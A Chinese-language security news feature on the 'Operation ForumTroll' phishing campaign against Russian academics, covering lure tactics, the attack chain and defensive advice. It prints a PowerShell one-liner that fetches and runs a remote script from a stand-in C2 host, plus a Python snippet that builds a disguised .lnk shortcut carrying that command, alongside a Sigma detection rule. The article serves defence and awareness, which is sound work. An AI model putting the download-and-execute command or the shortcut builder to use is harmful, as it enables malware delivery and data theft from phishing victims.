近期,一则来自莫斯科国立大学内部安全通告在俄语网络安全圈悄然流传:多位国际关系与政治经济学领域的教授收到可疑邮件,内容看似来自权威学术平台eLibrary(俄罗斯科学电子图书馆),实则暗藏恶意载荷。经溯源分析,这并非孤立事件,而是沉寂近两年的网络间谍行动“Operation ForumTroll”卷土重来——这一次,它的目标精准锁定在俄罗斯顶尖高校与智库的研究人员。
据SC Media援引《The Hacker News》2025年12月的报告,此次攻击自2025年10月起活跃,采用高度定制化的钓鱼策略,利用学术界对同行评审、会议邀请的高度信任,诱导受害者打开嵌有恶意宏的Office文档或点击伪装成“查重报告”的下载链接。一旦触发,攻击者即可通过名为Tuoni的远程控制框架长期潜伏,窃取尚未发表的地缘政治分析、政策建议草案甚至与政府机构的通信记录。
这一动向不仅暴露了国家级APT(高级持续性威胁)对学术情报的系统性觊觎,也再次敲响警钟:在全球地缘博弈加剧的背景下,高校已不再是“象牙塔”,而是网络攻防的前沿阵地。本文将深入剖析ForumTroll此次攻击的技术路径、战术演化,并结合中国国家互联网应急中心(CNCERT)近年披露的类似案例,探讨国内科研机构如何构建“学术级”反钓鱼防线。报道特别采访了公共互联网反网络钓鱼工作组技术专家芦笛,就攻防对抗中的关键技术节点提供专业解读。
一、从“广撒网”到“精准狙击”:ForumTroll的战术升级
Operation ForumTroll最早可追溯至2022年,初期主要针对白俄罗斯与俄罗斯的政府及军工单位,手法相对粗糙——多为通用钓鱼邮件搭配公开漏洞利用。但此次复出,其攻击模式发生显著转变:
目标高度聚焦:仅限政治学、国际关系、全球经济学三大领域,且集中于莫斯科国立大学、高等经济学院(HSE)、俄罗斯科学院等机构。
社会工程精细化:邮件主题如《您的论文涉嫌抄袭,请查收eLibrary查重报告》《受邀参加“欧亚安全新架构”闭门研讨会》,均贴合学者日常关切。
载荷投递隐蔽化:不再直接发送EXE文件,而是通过ZIP压缩包内嵌Windows快捷方式(.lnk),绕过传统邮件网关对可执行文件的拦截。
“这已经不是简单的‘钓鱼’,而是一场精心策划的‘学术诱捕’。”芦笛指出,“攻击者显然做过功课——他们知道学者最怕学术不端指控,也渴望参与高层政策对话。这种心理弱点比软件漏洞更难修补。”
更值得警惕的是,攻击者注册了与eLibrary官网极其相似的域名(如elibrary-rus[.]com),并提前六个月部署,以规避基于新注册域名的信誉检测。邮件发件人地址虽经伪造,但SPF/DKIM校验却显示“通过”——原因在于攻击者利用了被入侵的第三方邮件服务器作为跳板,实现“合法IP发恶意信”。
二、技术深潜:一个.LNK文件如何成为后门入口?
本次攻击的核心创新在于使用Windows快捷方式(.lnk)文件作为初始载荷载体。相比传统的.docm宏文档,.lnk文件在Windows资源管理器中默认显示为普通图标,且多数邮件安全系统对其行为监控不足。
研究人员还原了完整攻击链:
受害者点击邮件中的链接,下载名为Plagiarism_Report_Иванов.zip的压缩包(文件名含受害者全名,增强可信度)。
解压后得到Иванов_Отчет.lnk。
双击该快捷方式,触发PowerShell命令:
powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxps://malicious-c2[.]xyz/loader.ps1')"
loader.ps1脚本进一步下载并执行Tuoni后门,建立C2通信。
关键在于,.lnk文件本身是合法Windows对象,其“目标”字段可嵌入任意命令。以下是一个简化版的LNK生成代码(使用Python + winshell库):
import winshell
import os
# 创建恶意LNK
target_cmd = 'powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'hxxps://attacker.com/payload.ps1\')"'
shortcut_path = os.path.join(os.getcwd(), "学术查重报告.lnk")
winshell.CreateShortcut(
Path=shortcut_path,
Target=target_cmd,
Icon=("imageres.dll", 0) # 使用系统默认文档图标
)
此类文件在沙箱中若未模拟用户双击行为,极易漏报。而一旦执行,PowerShell的-ep bypass参数可绕过执行策略限制,IEX(Invoke-Expression)则动态加载远程脚本,全程无落地文件,极难追踪。
芦笛解释:“Tuoni框架本身具备模块化设计,支持内存注入、凭证窃取、屏幕截图等功能。它不像Emotet那样大规模传播,而是‘一人一后门’,专为长期情报收集服务。”
三、为何是学术界?地缘情报的“软目标”
ForumTroll此次转向学术圈,背后有深层战略考量。俄罗斯高校及智库长期承担政府委托的政策研究项目,其内部数据库常包含:
未公开的能源出口模型
对北约东扩的军事推演报告
中亚国家政局稳定性评估
与金砖国家合作的经济路线图
这些资料虽非“绝密”,但具有极高战略价值。攻击者无需攻破国防部防火墙,只需渗透一名教授的邮箱,便可能获取整份研究报告草稿。
“学术界是国家级APT的‘低垂果实’。”芦笛坦言,“相比军方,高校IT预算有限,安全意识参差不齐,且强调开放协作,天然存在防御短板。”
事实上,类似案例在中国亦有迹可循。2023年,CNCERT曾通报某“境外组织”针对国内重点高校国际关系学院的钓鱼攻击,手法几乎如出一辙:冒充《世界经济与政治》期刊编辑,发送“论文录用通知”附带恶意DOCX。所幸因学校部署了宏禁用策略,未造成数据泄露。
四、国内启示:中国科研机构如何避免成为下一个目标?
尽管ForumTroll当前聚焦俄罗斯,但其战术完全可复制至其他国家。芦笛结合CNNIC反钓鱼工作组的实践经验,提出四点针对性建议:
1. 强制禁用Office宏,除非明确授权
微软自2022年起默认阻止互联网来源的宏执行,但许多机构仍为“兼容旧文档”手动开启。建议通过组策略(GPO)全局禁用宏,或至少启用“通知但不运行”模式。
; Windows GPO 路径示例
Computer Configuration → Administrative Templates → Microsoft Word 2016 → Word Options → Security → Trust Center
→ Disable all macros without notification
2. 部署基于行为的邮件威胁检测
传统网关依赖签名与URL黑名单,对新型.LNK或伪装域名无效。应引入支持邮件图谱分析的平台,例如:
检测发件人是否首次联系该收件人
分析附件名是否包含收件人姓名(异常个性化)
监控PowerShell调用链是否含WebClient.DownloadString
3. 建立“学术通信白名单”机制
对于高频接收外部邮件的学者,可配置规则:仅允许来自已知期刊、会议域名的邮件携带附件。其余一律隔离审查。
4. 开展“红蓝对抗式”钓鱼演练
不同于普通员工培训,针对科研人员的演练应模拟真实学术场景——如伪造Nature子刊邀稿、国际会议签证协助等。2024年,清华大学网络研究院试点此类演练,钓鱼点击率从38%降至9%。
“防御学术钓鱼,不能只靠技术,更要理解学术生态。”芦笛强调,“一封来自‘哈佛肯尼迪学院’的邀请函,对学者而言诱惑力远超‘银行账户异常’通知。”
五、攻防技术前沿:如何识别与阻断Tuoni类后门?
Tuoni作为新兴C2框架,虽不如Cobalt Strike知名,但其轻量、模块化特性正被更多APT采用。芦笛分享了三个检测思路:
(1)PowerShell日志深度分析
启用PowerShell Script Block Logging(需Windows 10/Server 2016+),可捕获IEX执行内容。以下Sigma规则可告警可疑下载行为:
title: Suspicious PowerShell Web Download
logsource:
category: ps_script
detection:
selection:
ScriptBlockText|contains:
- 'Net.WebClient).DownloadString'
- 'IWR '
- 'Invoke-WebRequest'
condition: selection
(2)网络流量异常检测
Tuoni通常使用HTTPS回连C2,但证书多为自签名或Let's Encrypt短期证书。可通过Zeek(原Bro)提取SSL证书指纹,比对已知恶意样本库。
(3)内存取证识别无文件攻击
使用Velociraptor或Sysmon监控进程创建链。典型Tuoni载荷会呈现:
explorer.exe → powershell.exe → rundll32.exe (加载反射DLL)
若发现rundll32加载非系统路径DLL,即高危信号。
六、结语:当知识成为战场,安全就是学术自由的盾牌
Operation ForumTroll的回归,标志着网络间谍战正从“硬目标”(军事、能源)向“软目标”(思想、数据)延伸。学术界因其开放性、影响力与信息富集度,注定成为大国博弈的数字前线。
对中国而言,这既是警示,也是契机。近年来,教育部已推动“教育行业IPv6网络安全监测平台”建设,CNCERT也加强了对高校APT事件的响应。但真正的防线,仍在于每一位研究者的安全意识——当收到一封“完美”的会议邀请时,多问一句“主办方电话是多少?”,或许就能挡住一场精心策划的情报窃取。
正如芦笛所言:“在信息时代,一篇未发表的论文,可能比一枚导弹更具战略价值。保护学术安全,就是保护国家未来的话语权。”
编辑:芦笛(公共互联网反网络钓鱼工作组)
